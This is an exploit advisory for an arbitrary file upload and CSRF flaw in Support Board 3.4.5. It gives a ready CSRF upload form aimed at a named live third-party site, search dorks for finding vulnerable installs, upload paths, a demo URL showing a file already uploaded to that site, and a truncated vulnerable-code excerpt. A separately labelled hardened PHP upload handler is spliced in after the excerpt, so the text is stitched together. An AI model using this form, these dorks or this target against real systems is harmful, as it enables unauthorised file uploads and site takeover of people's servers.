Support Board 3.4.5 WP and NonWP Arbitrary File Upload / CSRF File Upload

2022.03.01
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Exploit Title: Support Board 3.4.5 Arbitrary File Upload / CSRF File Upload
Author: L4663r666h05t
Twitter: https://twitter.com/L4663r666h05t
Vendor Homepage: N/A
Postfile: file

CSRF Code:

<form action="https://www.support.angohost.ao/supportboard/include/upload.php" method="post" target="_blank">
<input type="file" name="file">
<input type="submit" name="kill" value=">>">
</form>

On Non-WP: /supportboard/include/upload.php
Dork For Non-WP: supportboard/uploads/

On WP: /wp-content/plugins/supportboard/supportboard/include/upload.php
Dork for WP: /wp-content/plugins/supportboard/supportboard/uploads/

Path file:
/supportboard/uploads/(date)/randomname_filename.jpg
/~path/uploads/(date)/randomname_filename.jpg

If vulnerable, upload.php will show this:
["error","Support Board Error: Key file in $_FILES not found."]

Demo:
https://www.support.angohost.ao/supportboard/include/upload.php

Result:
https://www.support.angohost.ao/supportboard/uploads/01-03-22/69927_0x.jpg

A successful upload will show text like:
["success","SB_URL\/uploads\/(timestamp)\/(random)_(your file name).jpg"]

Vulnerable code in upload.php:

$allowed_extensions = array('json','psd','ai','jpg','jpeg','png','gif','pdf','doc','docx','key','ppt','odt','xls','xlsx','zip','rar','mp3','m4a','ogg','wav','mp4','mov','wmv','avi','mpg','ogv','3gp','3g2','mkv','txt','ico','csv','ttf','font','css','scss');
if (isset($_FILES['file'])) {
    if (0 < $_FILES['file']['error']) {
        die(json_encode(array('error', 'Support Board: Error into upload.php file.')));
    } else {
        $file_name = sb_upload_escape($_FILES['file']['name']);
        $infos = pathinfo($file_name);
        $directory_date = date('d-m-y');
        $path = '../uploads/' . $directory_date;
        $url = SB_URL . '/uploads/' . $directory_date;
        if (isset($infos['extension']) && in_array(strtolower($infos['extension']), $allowed_extensions)) {
            if (defined('SB_UPLOAD_PATH') && SB_UPLOAD_PATH != '' && defined('SB_UPLOAD_URL') && SB_UPLOAD_URL != '') {
                $path = SB_UPLOAD_PATH . '/' . $directory_date;
                $url = SB_UPLOAD_URL . '/' . $directory_date;
            }
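A hardened counterpart to the upload.php excerpt above, as an added example that is not Support Board's code or the vendor's fix. It assumes a PHP session with hypothetical `user_id` and `csrf_token` keys, a form field named `csrf_token`, the fileinfo extension, and a narrower type allowlist; it adds the authentication, CSRF and content checks that the excerpt does not show.

```php
<?php
// Added example, not Support Board code. The session keys, the 'csrf_token'
// field name and the uploads directory are assumptions for illustration.
declare(strict_types=1);
session_start();

// Extension => MIME type the file's bytes must actually have.
$allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png',
            'gif' => 'image/gif', 'pdf' => 'application/pdf'];

function fail(int $status, string $message): void {
    http_response_code($status);
    die(json_encode(['error', $message]));
}

// 1. Only an authenticated user may upload (hypothetical session key).
if (empty($_SESSION['user_id'])) fail(401, 'Authentication required.');

// 2. Reject cross-site form posts: the token must match the one issued to this session.
$token = $_POST['csrf_token'] ?? '';
if (!is_string($token) || empty($_SESSION['csrf_token'])
    || !hash_equals((string) $_SESSION['csrf_token'], $token)) fail(403, 'Invalid CSRF token.');

// 3. Exactly one file, received without error, through PHP's upload mechanism.
$file = $_FILES['file'] ?? null;
if (!is_array($file) || !is_string($file['tmp_name'] ?? null)
    || ($file['error'] ?? null) !== UPLOAD_ERR_OK
    || !is_uploaded_file($file['tmp_name'])) fail(400, 'Upload failed.');

// 4. Extension and sniffed content type must agree; the client's name alone proves nothing.
$ext  = strtolower(pathinfo((string) $file['name'], PATHINFO_EXTENSION));
$mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
if (($allowed[$ext] ?? null) !== $mime) fail(415, 'File type not allowed.');

// 5. Store under a server-generated name so no client-supplied text reaches the path.
$dir = __DIR__ . '/uploads/' . date('d-m-y');
if (!is_dir($dir) && !mkdir($dir, 0750, true)) fail(500, 'Storage unavailable.');
$name = bin2hex(random_bytes(16)) . '.' . $ext;
if (!move_uploaded_file($file['tmp_name'], "$dir/$name")) fail(500, 'Could not store file.');

echo json_encode(['success', $name]);
```

Serving the uploads directory with script execution disabled and a `Content-Disposition: attachment` header limits what a stored file can do even if a check above is bypassed.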

